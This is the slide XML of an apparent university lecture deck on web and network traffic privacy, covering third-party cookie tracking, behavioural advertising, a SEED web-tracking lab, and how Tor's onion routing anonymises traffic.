            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2630488" y="4900614"/>
            <a:ext cx="4878143" cy="419099"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F5597"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WEB VISITOR TRACKING VIA COOKIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32903796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628650" y="365125"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learning Outcomes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14338" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upon completion of this lesson, students will be able to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be aware of the privacy issues of web tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand how it works to track users online with their cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Know the countermeasures against web tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1197580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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Behavioral targeting is a type of online advertising where ads are displayed based on the users web-browsing behavior. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user leaves a trail of digital foot prints moving from one website to the other.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When users surfs internet, the pages they visit, the searches they make, location of the user browsing from, device used for browsing and many other inputs are used by the tracking sites to collect data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A user profile is created from the data and data-mined for an online behavioral pattern of the user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As a result when users return to a specific site or a network of sites, the created user profiles are helpful in reaching the targeted audience to advertise. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7141343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Tracking through Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider visiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.abc.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> which has an advertising banner on its page owned by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adverts.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When you visit www.abc.com, the banner ad creates its own adverts.com cookie and places it on your device. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This new cookie (third party) has the domain of “adverts.com” because the banner ad was loaded into your browse from adverts.com. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you go to a new website called www.xyz.com. They also happen to have a banner ad by the same organization, adverts.com. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The cookie previously created by adverts.com when you were on the first website (www.abc.com), can now be opened and read by adverts.com to find where you had previously been. This allow Advertiser.com to track your activity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28045663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7583918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Activity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Web Tracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using the “Web Tracking” lab originally designed by Dr. Wenliang (Kevin) Du at Syracuse University</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32212914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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wikipedia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>https://en.wikipedia.org/wiki/HTTP_cookie#Drawbacks_of_cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W3Schools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>https://www.w3schools.com/php/php_cookies.asp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SEED labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>   http://www.cis.syr.edu/~wedu/seed/labs.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11695411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30488" y="3616325"/>
            <a:ext cx="4611687" cy="803275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3300" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="3300" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr sz="3300" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="3300" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t>WEB AND NETWORK TRAFFIC PRIVACY</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12290" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2481769" y="4984047"/>
            <a:ext cx="4219575" cy="277812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F5597"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4.     ANONYMIZATION WITH TOR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7786614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628650" y="365125"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learning Outcomes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14338" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upon completion of this lesson, students will be able to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Know the definition of Tor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Know how Tor functions to anonymize the Internet traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42734549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628650" y="365125"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is Tor?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14338" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tor stands for “The Onion Router (OR)”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developed by U.S Naval Research Lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tor relies on the principle of “Onion Routing.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21986495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203CD-8A3E-47BD-9440-2C0289CE7CDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Onion Routing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C144B29E-7029-4664-9EA2-AA9829DFBAE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Onion routing is an anonymous communication technique over a computer network. Messages are constantly encrypted and then sent through several network nodes called ORs which creates a circuit of nodes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each OR removes a layer of encryption with its symmetric key to reveal routing instructions, and send the message to the next router where this process is repeated.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35441955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Onion Route Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Prior tranmission, the sender chooses a random sequence of onion routers and control the length of the path. Some routers are honest and some could be controlled by attacher. Due to the routing mechanism of Tor, however, it ensures the attacker router(s) has only limited info of the up-link router and down-link router and cannot decrypt the original message, and therefore, guarantees perfect forward secrecy." title="Onion Route Path"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087718" y="1825625"/>
            <a:ext cx="6968563" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37272968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2E79DD-3E12-46FA-B9E9-EC388EAEB329}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decryption in Onion Routing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="This picture shows an example of the decryptions along the Onion Routing in which the data from the sender will pass through Onion Routers 4, 3 and 5 in order before reaching the target. The sender will first encrypt the data using an ephemeral session key agreeed between the sender and OR5 and then wrap it with OR5's IP address to generate a data cell, then the data cell is encrypted using an ephemeral session key agreed between the sender and OR3 and again wrapped with OR3's IP address to generate a new data cell. After that, this data cell is encrypted using the ephemeral session key agreed between the sender and OR4 to generate the final data cell for transmission. The sender will send the data cell to router 4 which will decrypt the most external layer by using its session key to find the next router, OR3's IP address and the encrypted payload. Similarly, once OR3 receives the data cell from OR4, it will use its session key to decrypt the payload to find the next router, OR5's IP address and the encrypted payload. Finally, once OR5 receives the datagram from OR3, it will use its private key to decrypt the payload to find the target's IP address and original data, and then send the data to the target. " title="Decryption in Onion Routing">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E734A7F-BF75-46BF-9FEB-B930996D46C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="787232" y="1443579"/>
            <a:ext cx="6169757" cy="4539382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35566943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FAD5A-D20E-4281-87DF-CB97B8D93C17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Onion Routing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88B9B958-29C6-4437-BFE9-6322653316BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Onion routing encrypts/decrypts the network traffic typically three separate times.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once for each node it passes through.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typical nodes in a Onion routing are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Entry node</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Middle node/ relay node</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exit Node</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32806996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does the Internet work?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="TCP and IP are the most important protocols in Internet routing and data transmission. IP represents Internet Protocol which is used in the network layer. Through its header fields like the source address, destination address, service types, etc., IP provides the network layer with the user location information and the knowledge of services being used. TCP represents the Transport Control Protocol which is used in the transport layer. TCP uses ports and handshaking scheme for data transmission. It provides the transport layer a good idea of the nature of traffic. Private information may also be contained in its content. " title="The TCP/IP structure in Internet"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="329178" y="1847088"/>
            <a:ext cx="8485644" cy="4293940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14264223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628650" y="365125"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduction to Web Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14338" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628649" y="1825625"/>
            <a:ext cx="8147797" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A piece of data sent by website and saved in user’s computer by web browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Designed for recording user’s browsing activity and stateful information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be used to remember sensitive information entered by user (login name, password, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Structure of Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Name, Value, and Attribute(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: a cookie created using PHP script with an attribute of expiration time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
